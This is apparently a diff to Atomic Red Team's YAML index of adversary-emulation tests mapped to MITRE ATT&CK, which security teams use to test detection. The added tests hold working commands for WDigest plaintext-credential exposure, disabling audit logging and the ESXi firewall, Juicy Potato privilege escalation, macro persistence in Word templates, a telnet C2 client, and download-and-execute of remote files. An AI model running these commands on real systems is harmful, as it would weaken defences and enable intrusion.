+        DLL created with the AtomicTestHarnesses Portable Executable Builder script.
+      supported_platforms:
+      - windows
+      input_arguments:
+        dll_file:
+          description: The DLL file to be called
+          type: string
+          default: PathToAtomicsFolder\T1218.011\bin\_WT.init
+        dll_url:
+          description: The URL to the DLL file that must be downloaded
+          type: url
+          default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/bin/_WT.init
+      dependency_executor_name: powershell
+      dependencies:
+      - description: The DLL file to be called must exist at the specified location
+          (#{dll_file})
+        prereq_command: if (Test-Path "#{dll_file}") {exit 0} else {exit 1}
+        get_prereq_command: |
+          New-Item -Type Directory (split-path "#{dll_file}") -ErrorAction ignore | Out-Null
+          Invoke-WebRequest "#{dll_url}" -OutFile "#{dll_file}"
+      executor:
+        command: 'rundll32.exe #{dll_file},krnl
+
+          '
+        name: command_prompt
  T1027.009:
    technique:
      modified: '2023-09-29T21:14:57.263Z'
@@ -3086,7 +3115,7 @@ defense-evasion:
  T1542.001:
    technique:
      modified: '2023-03-30T21:01:49.493Z'
-      name: System Firmware
+      name: 'Pre-OS Boot: System Firmware'
      description: |-
        Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI)

@@ -3161,7 +3190,24 @@ defense-evasion:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      x_mitre_attack_spec_version: 3.1.0
-    atomic_tests: []
+      identifier: T1542.001
+    atomic_tests:
+    - name: UEFI Persistence via Wpbbin.exe File Creation
+      auto_generated_guid: b8a49f03-e3c4-40f2-b7bb-9e8f8fdddbf1
+      description: |
+        Creates Wpbbin.exe in %systemroot%. This technique can be used for UEFI-based pre-OS boot persistence mechanisms.
+        - https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c
+        - http://download.microsoft.com/download/8/a/2/8a2fb72d-9b96-4e2d-a559-4a27cf905a80/windows-platform-binary-table.docx
+        - https://github.com/tandasat/WPBT-Builder
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        command: "echo \"Creating %systemroot%\\wpbbin.exe\"      \nNew-Item -ItemType
+          File -Path \"$env:SystemRoot\\System32\\wpbbin.exe\"\n"
+        cleanup_command: "echo \"Removing %systemroot%\\wpbbin.exe\" \nRemove-Item
+          -Path \"$env:SystemRoot\\System32\\wpbbin.exe\"\n"
+        elevation_required: true
  T1574.011:
    technique:
      modified: '2023-03-30T21:01:38.651Z'
@@ -11130,6 +11176,48 @@ defense-evasion:
          '
        name: command_prompt
        elevation_required: true
+    - name: ESXi - Disable Firewall via Esxcli
+      auto_generated_guid: bac8a340-be64-4491-a0cc-0985cb227f5a
+      description: 'Adversaries may disable the ESXI firewall via ESXCLI
+
+        '
+      supported_platforms:
+      - windows
+      input_arguments:
+        vm_host:
+          description: Specify the host name of the ESXi Server
+          type: string
+          default: atomic.local
+        plink_file:
+          description: Path to Putty
+          type: path
+          default: PathToAtomicsFolder\..\ExternalPayloads\plink.exe
+        username:
+          description: username used to log into ESXi
+          type: string
+          default: root
+        password:
+          description: password used to log into ESXI
+          type: string
+          default: n/a
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'The plink executable must be found in the ExternalPayloads folder.
+
+          '
+        prereq_command: 'if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+          Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
+      executor:
+        command: "#{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m
+          PathToAtomicsFolder\\..\\atomics\\T1562.004\\src\\esxi_disable_firewall.txt\n"
+        cleanup_command: "#{plink_file} -ssh #{vm_host} -l #{username} -pw #{password}
+          -m PathToAtomicsFolder\\..\\atomics\\T1562.004\\src\\esxi_enable_firewall.txt\n"
+        name: command_prompt
+        elevation_required: false
  T1553.003:
    technique:
      x_mitre_platforms:
@@ -11956,6 +12044,24 @@ defense-evasion:
          '
        name: command_prompt
        elevation_required: true
+    - name: Use Powershell to Modify registry to store logon credentials
+      auto_generated_guid: 68254a85-aa42-4312-a695-38b7276307f8
+      description: |
+        Sets registry key using Powershell that will tell windows to store plaintext passwords (making the system vulnerable to clear text / cleartext password dumping).
+        Open Registry Editor to view the modified entry in HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest.
+      supported_platforms:
+      - windows
+      executor:
+        command: 'Set-ItemProperty -Force -Path  ''HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest''
+          -Name  ''UseLogonCredential'' -Value ''1'' -ErrorAction Ignore
+
+          '
+        cleanup_command: 'Set-ItemProperty -Force -Path  ''HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest''
+          -Name  ''UseLogonCredential'' -Value ''0'' -ErrorAction Ignore
+
+          '
+        name: powershell
+        elevation_required: true
    - name: Add domain to Trusted sites Zone
      auto_generated_guid: cf447677-5a4e-4937-a82c-e47d254afd57
      description: |
@@ -17715,6 +17821,53 @@ defense-evasion:
          '
        name: powershell
        elevation_required: true
+    - name: Juicy Potato
+      auto_generated_guid: f095e373-b936-4eb4-8d22-f47ccbfbe64a
+      description: "This Atomic utilizes Juicy Potato to obtain privilege escalation.
+        \nUpon successful execution of this test, a vulnerable CLSID will be used
+        to execute a process with system permissions.\nThis tactic has been previously
+        observed in SnapMC Ransomware, amongst numerous other campaigns. \n[Reference](https://blog.fox-it.com/2021/10/11/snapmc-skips-ransomware-steals-data/)"
+      supported_platforms:
+      - windows
+      input_arguments:
+        potato_path:
+          description: Path to the JuicyPotato.exe file
+          type: path
+          default: PathToAtomicsFolder\..\ExternalPayloads\JuicyPotato.exe
+        listening_port:
+          description: COM server listen port
+          type: integer
+          default: 7777
+        target_exe:
+          description: Target executable to launch with system privileges
+          type: path
+          default: "$env:windir\\system32\\notepad.exe"
+        target_CLSID:
+          description: Vulnerable CLSID to impersonate privileges
+          type: string
+          default: "{F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'JuicyPotato.exe must exist on disk
+
+          '
+        prereq_command: 'if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\JuicyPotato.exe")
+          {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+          Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\JuicyPotato.exe" "https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe"
+      executor:
+        command: 'cmd /c ''#{potato_path}'' -l ''#{listening_port}'' -t * -p ''#{target_exe}''
+          -c ''#{target_CLSID}''
+
+          '
+        cleanup_command: |
+          get-ciminstance Win32_Process | where-object { $_.Path -eq "#{target_exe}" } | invoke-cimmethod -methodname "terminate" | out-null
+          get-ciminstance Win32_Process | where-object { $_.Path -eq "#{potato_path}" } | invoke-cimmethod -methodname "terminate" | out-null
+        name: powershell
+        elevation_required: true
  T1205.001:
    technique:
      x_mitre_platforms:
@@ -18055,7 +18208,7 @@ defense-evasion:
  T1562.003:
    technique:
      modified: '2023-03-30T21:01:47.940Z'
-      name: 'Impair Defenses: HISTCONTROL'
+      name: 'Impair Defenses: Impair Command History Logging'
      description: "Adversaries may impair command history logging to hide commands
        they run on a compromised system. Various command interpreters keep track
        of the commands users type in their terminal so that users can retrace what
@@ -18340,6 +18493,67 @@ defense-evasion:
        cleanup_command: 'unset HISTIGNORE

          '
+    - name: Disable Windows Command Line Auditing using reg.exe
+      auto_generated_guid: 1329d5ab-e10e-4e5e-93d1-4d907eb656e5
+      description: |
+        In Windows operating systems, command line auditing is controlled through the following registry value:
+
+          Registry Path: HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit
+          Registry Value: ProcessCreationIncludeCmdLine_Enabled
+
+        When command line auditing is enabled, the system records detailed information about command execution, including the command executed, the user account responsible for executing the command, and the timestamp of the execution.
+        This information is crucial for security monitoring and forensic analysis, as it helps organizations detect and investigate unauthorized or malicious activities within their systems.
+        By default, command line auditing may not be enabled in Windows systems, and administrators must manually configure the appropriate registry settings to activate it.
+        Conversely, attackers may attempt to tamper with these registry keys to disable command line auditing, as part of their efforts to evade detection and cover their tracks while perpetrating malicious activities.
+
+        Because this attack executes reg.exe using a command prompt, this attack can be detected by monitoring both:
+          Process Creation events for reg.exe (Windows Event ID 4688, Sysmon Event ID 1)
+          Registry events (Windows Event ID 4657, Sysmon Event ID 13)
+
+        Read more here:
+        https://securitydatasets.com/notebooks/atomic/windows/defense_evasion/SDWIN-220703123711.html
+      supported_platforms:
+      - windows
+      executor:
+        name: command_prompt
+        elevation_required: true
+        command: |
+          echo Commencing Attack - Disabling Registry Value
+          reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit /v ProcessCreationIncludeCmdLine_Enabled /t REG_DWORD /d 0 /f
+        cleanup_command: |
+          echo Commencing Cleanup - Restoring Registry Value
+          reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit /v ProcessCreationIncludeCmdLine_Enabled /t REG_DWORD /d 1 /f
+    - name: Disable Windows Command Line Auditing using Powershell Cmdlet
+      auto_generated_guid: 95f5c72f-6dfe-45f3-a8c1-d8faa07176fa
+      description: |
+        In Windows operating systems, command line auditing is controlled through the following registry value:
+
+          Registry Path: HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit
+          Registry Value: ProcessCreationIncludeCmdLine_Enabled
+
+        When command line auditing is enabled, the system records detailed information about command execution, including the command executed, the user account responsible for executing the command, and the timestamp of the execution.
+        This information is crucial for security monitoring and forensic analysis, as it helps organizations detect and investigate unauthorized or malicious activities within their systems.
+        By default, command line auditing may not be enabled in Windows systems, and administrators must manually configure the appropriate registry settings to activate it.
+        Conversely, attackers may attempt to tamper with these registry keys to disable command line auditing, as part of their efforts to evade detection and cover their tracks while perpetrating malicious activities.
+
+        Because this attack runs a Powershell cmdlet, this attack can be detected by monitoring both:
+          Powershell Logging (Windows Powershell Event ID 400, 800, 4103, 4104)
+          Registry events (Windows Event ID 4657, Sysmon Event ID 13)
+
+        Read more here:
+        https://securitydatasets.com/notebooks/atomic/windows/defense_evasion/SDWIN-220703123711.html
+        https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/new-itemproperty?view=powershell-7.4#example-2-add-a-registry-entry-to-a-key
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: true
+        command: |
+          echo "Commencing Attack - Disabling Registry Value"
+          New-ItemProperty -Path "HKLM:Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit" -Name "ProcessCreationIncludeCmdLine_Enabled" -Value 0 -PropertyType DWORD -Force -ErrorAction Ignore
+        cleanup_command: |
+          echo "Commencing Cleanup - Restoring Registry Value"
+          New-ItemProperty -Path "HKLM:Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit" -Name "ProcessCreationIncludeCmdLine_Enabled" -Value 1 -PropertyType DWORD -Force -ErrorAction Ignore
  T1556.008:
    technique:
      modified: '2023-05-04T18:02:51.318Z'
@@ -38898,6 +39112,53 @@ privilege-escalation:
          '
        name: powershell
        elevation_required: true
+    - name: Juicy Potato
+      auto_generated_guid: f095e373-b936-4eb4-8d22-f47ccbfbe64a
+      description: "This Atomic utilizes Juicy Potato to obtain privilege escalation.
+        \nUpon successful execution of this test, a vulnerable CLSID will be used
+        to execute a process with system permissions.\nThis tactic has been previously
+        observed in SnapMC Ransomware, amongst numerous other campaigns. \n[Reference](https://blog.fox-it.com/2021/10/11/snapmc-skips-ransomware-steals-data/)"
+      supported_platforms:
+      - windows
+      input_arguments:
+        potato_path:
+          description: Path to the JuicyPotato.exe file
+          type: path
+          default: PathToAtomicsFolder\..\ExternalPayloads\JuicyPotato.exe
+        listening_port:
+          description: COM server listen port
+          type: integer
+          default: 7777
+        target_exe:
+          description: Target executable to launch with system privileges
+          type: path
+          default: "$env:windir\\system32\\notepad.exe"
+        target_CLSID:
+          description: Vulnerable CLSID to impersonate privileges
+          type: string
+          default: "{F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'JuicyPotato.exe must exist on disk
+
+          '
+        prereq_command: 'if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\JuicyPotato.exe")
+          {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+          Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\JuicyPotato.exe" "https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe"
+      executor:
+        command: 'cmd /c ''#{potato_path}'' -l ''#{listening_port}'' -t * -p ''#{target_exe}''
+          -c ''#{target_CLSID}''
+
+          '
+        cleanup_command: |
+          get-ciminstance Win32_Process | where-object { $_.Path -eq "#{target_exe}" } | invoke-cimmethod -methodname "terminate" | out-null
+          get-ciminstance Win32_Process | where-object { $_.Path -eq "#{potato_path}" } | invoke-cimmethod -methodname "terminate" | out-null
+        name: powershell
+        elevation_required: true
  T1098.001:
    technique:
      modified: '2023-10-03T17:37:24.011Z'
@@ -50031,7 +50292,49 @@ execution:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      x_mitre_attack_spec_version: 3.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-    atomic_tests: []
+      identifier: T1059
+    atomic_tests:
+    - name: AutoIt Script Execution
+      auto_generated_guid: a9b93f17-31cb-435d-a462-5e838a2a6026
+      description: 'An adversary may attempt to execute suspicious or malicious script
+        using AutoIt software instead of regular terminal like powershell or cmd.
+        Calculator will popup when the script is executed successfully.
+
+        '
+      supported_platforms:
+      - windows
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'AutoIt executable file must exist on disk at the specified location
+          (#{autoit_path})
+
+          '
+        prereq_command: |
+          if(Test-Path "#{autoit_path}") {
+              exit 0
+          } else {
+              exit 1
+          }
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+          $AutoItURL = "https://www.autoitscript.com/cgi-bin/getfile.pl?autoit3/autoit-v3-setup.exe"
+          $InstallerPath = "$PathToAtomicsFolder\..\ExternalPayloads\autoit-v3-setup.exe"
+          Invoke-WebRequest -Uri $AutoItURL -OutFile $InstallerPath
+          Start-Process -FilePath $InstallerPath -ArgumentList "/S" -Wait
+      input_arguments:
+        script_path:
+          description: AutoIt Script Path
+          type: path
+          default: PathToAtomicsFolder\T1059\src\calc.au3
+        autoit_path:
+          description: AutoIt Executable File Path
+          type: path
+          default: C:\Program Files (x86)\AutoIt3\AutoIt3.exe
+      executor:
+        command: 'Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
+
+          '
+        name: powershell
  T1609:
    technique:
      modified: '2023-04-15T16:03:19.642Z'
@@ -52230,7 +52533,8 @@ execution:
          which_python=$(which python || which python3 || which python3.9 || which python2)
          $which_python -c 'import requests;import os;url = "#{script_url}";malicious_command = "#{executor} #{payload_file_name} #{script_args}";session = requests.session();source = session.get(url).content;fd = open("#{payload_file_name}", "wb+");fd.write(source);fd.close();os.system(malicious_command)'
        name: sh
-        cleanup_command: "rm #{payload_file_name} \n"
+        cleanup_command: "rm #{payload_file_name} \npip-autoremove pypykatz >nul 2>
+          nul\n"
    - name: Execute Python via scripts
      auto_generated_guid: 6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8
      description: Create Python file (.py) that downloads and executes shell script
@@ -54853,7 +55157,7 @@ persistence:
  T1542.001:
    technique:
      modified: '2023-03-30T21:01:49.493Z'
-      name: System Firmware
+      name: 'Pre-OS Boot: System Firmware'
      description: |-
        Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI)

@@ -54928,7 +55232,24 @@ persistence:
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      x_mitre_attack_spec_version: 3.1.0
-    atomic_tests: []
+      identifier: T1542.001
+    atomic_tests:
+    - name: UEFI Persistence via Wpbbin.exe File Creation
+      auto_generated_guid: b8a49f03-e3c4-40f2-b7bb-9e8f8fdddbf1
+      description: |
+        Creates Wpbbin.exe in %systemroot%. This technique can be used for UEFI-based pre-OS boot persistence mechanisms.
+        - https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c
+        - http://download.microsoft.com/download/8/a/2/8a2fb72d-9b96-4e2d-a559-4a27cf905a80/windows-platform-binary-table.docx
+        - https://github.com/tandasat/WPBT-Builder
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        command: "echo \"Creating %systemroot%\\wpbbin.exe\"      \nNew-Item -ItemType
+          File -Path \"$env:SystemRoot\\System32\\wpbbin.exe\"\n"
+        cleanup_command: "echo \"Removing %systemroot%\\wpbbin.exe\" \nRemove-Item
+          -Path \"$env:SystemRoot\\System32\\wpbbin.exe\"\n"
+        elevation_required: true
  T1574.011:
    technique:
      modified: '2023-03-30T21:01:38.651Z'
@@ -60750,7 +61071,7 @@ persistence:
        description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
          Retrieved February 5, 2019.
      modified: '2021-08-16T21:27:10.873Z'
-      name: Office Template Macros
+      name: 'Office Application Startup: Office Template Macros.'
      description: "Adversaries may abuse Microsoft Office templates to obtain persistence
        on a compromised system. Microsoft Office contains templates that are part
        of common Office applications and are used to customize styles. The base templates
@@ -60802,7 +61123,104 @@ persistence:
      x_mitre_permissions_required:
      - User
      - Administrator
-    atomic_tests: []
+      identifier: T1137.001
+    atomic_tests:
+    - name: Injecting a Macro into the Word Normal.dotm Template for Persistence via
+        PowerShell
+      auto_generated_guid: 940db09e-80b6-4dd0-8d4d-7764f89b47a8
+      description: 'Injects a Macro in the Word default template "Normal.dotm" and
+        makes it execute each time that Word is opened. In this test, the Macro creates
+        a sheduled task to open Calc.exe every evening.
+
+        '
+      supported_platforms:
+      - windows
+      dependencies:
+      - description: 'Microsoft Word must be installed
+
+          '
+        prereq_command: |
+          try {
+            New-Object -COMObject "Word.Application" | Out-Null
+            Stop-Process -Name "winword"
+            exit 0
+          } catch { exit 1 }
+        get_prereq_command: 'Write-Host "You will need to install Microsoft Word manually
+          to meet this requirement"
+
+          '
+      executor:
+        name: powershell
+        elevation_required: true
+        command: "# Registry setting to \"Trust access to the VBA project object model\"
+          in Word\n$registryKey = \"HKCU:Software\\Microsoft\\Office\\16.0\\Word\\Security\"\n$registryValue
+          = \"AccessVBOM\"\n$registryData = \"1\"\n# The path where a flag text file
+          will be created if Registry setting did not already exist or if it was set
+          to 0\n$flagPath1 = \"$env:USERPROFILE\\AppData\\Roaming\\Microsoft\\Templates\\T1137-001_Flag1.txt\"\n$flagPath2
+          = \"$env:USERPROFILE\\AppData\\Roaming\\Microsoft\\Templates\\T1137-001_Flag2.txt\"\n#
+          Get the value of the Key/Value pair\n$value = (Get-ItemProperty -Path $registryKey
+          -Name $registryValue -ErrorAction SilentlyContinue).$registryValue\n# Logical
+          operation to: if the value of the key/value is 1, do nothing - \n# if the
+          value is 0, change it to 1 and create flag1 - \n# if it doesn't exist, create
+          the value and flag2\nif ($value -eq \"1\") \n{\n  Write-Host \"The registry
+          value '$registryValue' already exists with the required setting.\"\n}   \n
+          \ elseif ($value -eq \"0\") \n{\n  Write-Host \"The registry value was set
+          to 0, temporarily changing to 1.\"\n  New-ItemProperty -Path $registryKey
+          -Name $registryValue -Value $registryData -PropertyType DWORD -Force | Out-Null\n
+          \ echo \"flag1\" > $flagPath1\n} \n  else \n{\n  Write-Host \"The registry
+          value '$registryValue' does not exist, temporarily creating it.\"\n  New-ItemProperty
+          -Path $registryKey -Name $registryValue -Value $registryData -PropertyType
+          DWORD -Force | Out-Null\n  echo \"flag2\" > $flagPath2\n}\nAdd-Type -AssemblyName
+          Microsoft.Office.Interop.Word\n# Define the path of copied normal template
+          for restoral\n$copyPath = \"$env:USERPROFILE\\AppData\\Roaming\\Microsoft\\Templates\\Normal1.dotm\"\n#
+          Define the path to the normal template\n$docPath = \"$env:USERPROFILE\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm\"\n#
+          Create copy of orginal template for restoral\nCopy-Item -Path $docPath -Destination
+          $copyPath -Force\n# VBA code to be insterted as a Macro\n# Will create a
+          scheduled task to open the Calculator at 8:04pm daily\n$vbaCode = @\"\n
+          \ Sub AutoExec()\n  Dim applicationPath As String\n  Dim taskName As String\n
+          \ Dim runTime As String\n  Dim schTasksCmd As String\n  applicationPath
+          = \"C:\\Windows\\System32\\calc.exe\"\n  taskName = \"OpenCalcTask\"\n  runTime
+          = \"20:04\"\n  schTasksCmd = \"schtasks /create /tn \"\"\" & taskName &
+          \"\"\" /tr \"\"\" & applicationPath & \"\"\" /sc daily /st \" & runTime
+          & \" /f\"\n  Shell \"cmd.exe /c \" & schTasksCmd, vbNormalFocus\n  End Sub\n\"@\n#
+          Create a new instance of Word.Application\n$word = New-Object -ComObject
+          Word.Application\n# Keep the Word application hidden\n$word.Visible = $false\n#
+          Open the document\n$document = $word.Documents.Open($docPath)\n# Access
+          the VBA project of the document\n$vbaProject = $document.VBProject\n# Add
+          a new module to the VBA project\n$newModule = $vbaProject.VBComponents.Add(1)
+          # 1 = vbext_ct_StdModule\n# Add the VBA code to the new module\n$newModule.CodeModule.AddFromString($vbaCode)\n#
+          Run the Macro\n$word.run(\"AutoExec\")\n# Save and close the document\n$document.SaveAs($docPath)\n$document.Close()\n#
+          Quit Word\n$word.Quit()\n# Release COM objects\n[System.Runtime.InteropServices.Marshal]::ReleaseComObject($document)
+          | Out-Null\n[System.Runtime.InteropServices.Marshal]::ReleaseComObject($word)
+          | Out-Null\n[System.Runtime.InteropServices.Marshal]::ReleaseComObject($vbaProject)
+          | Out-Null\n[System.Runtime.InteropServices.Marshal]::ReleaseComObject($newModule)
+          | Out-Null\n"
+        cleanup_command: "# Registry setting to \"Trust access to the VBA project
+          object model\" in Word\n$registryKey = \"HKCU:Software\\Microsoft\\Office\\16.0\\Word\\Security\"\n$registryValue
+          = \"AccessVBOM\"\n$registryData1 = \"1\"\n$registryData0 = \"0\"\n# Defines
+          the path each flag file created depending on the original registry state\n$flagPath1
+          = \"$env:USERPROFILE\\AppData\\Roaming\\Microsoft\\Templates\\T1137-001_Flag1.txt\"\n$flagPath2
+          = \"$env:USERPROFILE\\AppData\\Roaming\\Microsoft\\Templates\\T1137-001_Flag2.txt\"\n#
+          Define the path of copied normal template for restoral\n$copyPath = \"$env:USERPROFILE\\AppData\\Roaming\\Microsoft\\Templates\\Normal1.dotm\"\n#
+          Define the path to the normal template\n$docPath = \"$env:USERPROFILE\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm\"\n#
+          Delete the scheduled task created by the Macro\nschtasks /Delete /TN \"OpenCalcTask\"
+          /F | Out-Null\n#Restore the orginal template if the backup copy exists\nif
+          (Test-Path $copyPath)\n{\n  #Delete the injected template\n  Remove-Item
+          -Force $docPath -ErrorAction SilentlyContinue\n  # Restore the original
+          template\n  Rename-Item -Force -Path $copyPath -NewName $docPath -ErrorAction
+          SilentlyContinue\n  Write-Host \"The original template has been restored\"\n}\n
+          \ else\n{\n  Write-Host \"The original template is present\"\n}\n#Restore
+          the original state of the registry key\nif (Test-Path $flagPath1) \n{\n
+          \ # The value was originally 0, set back to 0\n  New-ItemProperty -Path
+          $registryKey -Name $registryValue -Value $registryData0 -PropertyType DWORD
+          -Force | Out-Null\n  Remove-Item -Force $flagPath1 -ErrorAction SilentlyContinue\n
+          \ Write-Host \"The original registry state has been restored\"\n} \n  elseif
+          (Test-Path $flagPath2)\n{\n  #The value did not previously exist, delete
+          the value\n  Remove-ItemProperty -Path $registryKey -Name $registryValue
+          | Out-Null\n  Remove-Item -Force $flagPath2 -ErrorAction SilentlyContinue
+          | Out-Null\n  Write-Host \"The original registry state has been restored\"\n}\n
+          \ else \n{\n  # The value was already 1, do nothing\n  Write-Host \"The
+          value $registryValue already existed in $registryKey.\"\n}\n"
  T1546.009:
    technique:
      x_mitre_platforms:
@@ -70468,7 +70886,46 @@ command-and-control:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      x_mitre_attack_spec_version: 3.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-    atomic_tests: []
+      identifier: T1071
+    atomic_tests:
+    - name: Telnet C2
+      auto_generated_guid: 3b0df731-030c-4768-b492-2a3216d90e53
+      description: 'An adversary may establish telnet communication from compromised
+        endpoint to command and control (C2) server to be able to operate more attack
+        on objectives.
+
+        '
+      supported_platforms:
+      - windows
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Command and Control (C2) server cam be established by running
+          PathToAtomicsFolder\T1071\bin\telnet_server.exe on specified server with
+          specified IP that must be reachable by client (telnet_client.exe)
+
+          '
+        prereq_command: |
+          $connection = Test-NetConnection -ComputerName #{server_ip} -Port #{server_port}
+          if ($connection.TcpTestSucceeded) {exit 0} else {exit 1}
+        get_prereq_command: 'Write-Host "Setup C2 server manually"
+
+          '
+      input_arguments:
+        server_ip:
+          description: C2 server IP or URL
+          type: url
+          default: 127.0.0.1
+        client_path:
+          description: Client agent path
+          type: url
+          default: PathToAtomicsFolder\T1071\bin\telnet_client.exe
+        server_port:
+          description: C2 server port
+          type: Integer
+          default: 23
+      executor:
+        command: "#{client_path} #{server_ip} --port #{server_port}\n"
+        name: powershell
  T1219:
    technique:
      modified: '2023-09-28T16:23:51.194Z'
@@ -70847,6 +71304,22 @@ command-and-control:
          '
        name: powershell
        elevation_required: true
+    - name: RustDesk Files Detected Test on Windows
+      auto_generated_guid: f1641ba9-919a-4323-b74f-33372333bf0e
+      description: "An adversary may attempt to trick the user into downloading RustDesk
+        and use this to maintain access to the machine. \nDownload of RustDesk installer
+        will be at the destination location when successfully executed.\n"
+      supported_platforms:
+      - windows
+      executor:
+        command: |-
+          $file = Join-Path $env:USERPROFILE "Desktop\rustdesk-1.2.3-1-x86_64.exe"
+          Invoke-WebRequest  -OutFile $file https://github.com/rustdesk/rustdesk/releases/download/1.2.3-1/rustdesk-1.2.3-1-x86_64.exe
+          Start-Process -FilePath $file "/S"
+        cleanup_command: |-
+          $file = Join-Path $env:USERPROFILE "Desktop\rustdesk-1.2.3-1-x86_64.exe"
+          Remove-Item $file1 -ErrorAction Ignore
+        name: powershell
  T1659:
    technique:
      modified: '2023-10-01T02:28:45.147Z'
@@ -72785,9 +73258,9 @@ command-and-control:
          '
        get_prereq_command: |
          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
-          Invoke-WebRequest "https://curl.haxx.se/windows/dl-7.71.1/curl-7.71.1-win32-mingw.zip" -Outfile "PathToAtomicsFolder\..\ExternalPayloads\curl.zip"
+          Invoke-WebRequest "https://curl.se/windows/dl-8.6.0_2/curl-8.6.0_2-win32-mingw.zip" -Outfile "PathToAtomicsFolder\..\ExternalPayloads\curl.zip"
          Expand-Archive -Path "PathToAtomicsFolder\..\ExternalPayloads\curl.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\curl"
-          Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\curl\curl-7.71.1-win32-mingw\bin\curl.exe" #{curl_path}
+          Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\curl\curl-8.6.0_2-win32-mingw\bin\curl.exe" #{curl_path}
          Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\curl"
          Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\curl.zip"
      executor:
@@ -73815,7 +74288,7 @@ command-and-control:
          & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
        source_name: University of Birmingham C2
      modified: '2020-03-15T00:37:58.963Z'
-      name: Steganography
+      name: Data Obfuscation via Steganography
      description: 'Adversaries may use steganographic techniques to hide command
        and control traffic to make detection efforts more difficult. Steganographic
        techniques can be used to hide data in digital messages that are transferred
@@ -73837,7 +74310,156 @@ command-and-control:
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      x_mitre_data_sources:
      - 'Network Traffic: Network Traffic Content'
-    atomic_tests: []
+      identifier: T1001.002
+    atomic_tests:
+    - name: Steganographic Tarball Embedding
+      auto_generated_guid: c7921449-8b62-4c4d-8a83-d9281ac0190b
+      description: "This atomic test, named \"Steganographic Tarball Embedding\",
+        simulates the technique of data obfuscation via steganography by embedding
+        a tar archive file (tarball) \nwithin an image.\n\nThe test begins by ensuring
+        the availability of the image file and the tarball file containing data .
+        It then generates random passwords and saves them to a \nfile. Subsequently,
+        the tarball file is created, containing the passwords file. The test executor
+        command reads the contents of the image \nfile and the tarball file as byte
+        arrays and appends them together to form a new image file. This process effectively
+        embeds the tarball \nfile within the image, utilizing steganography techniques
+        for data obfuscation.\n\nThis atomic test simulates the technique of data
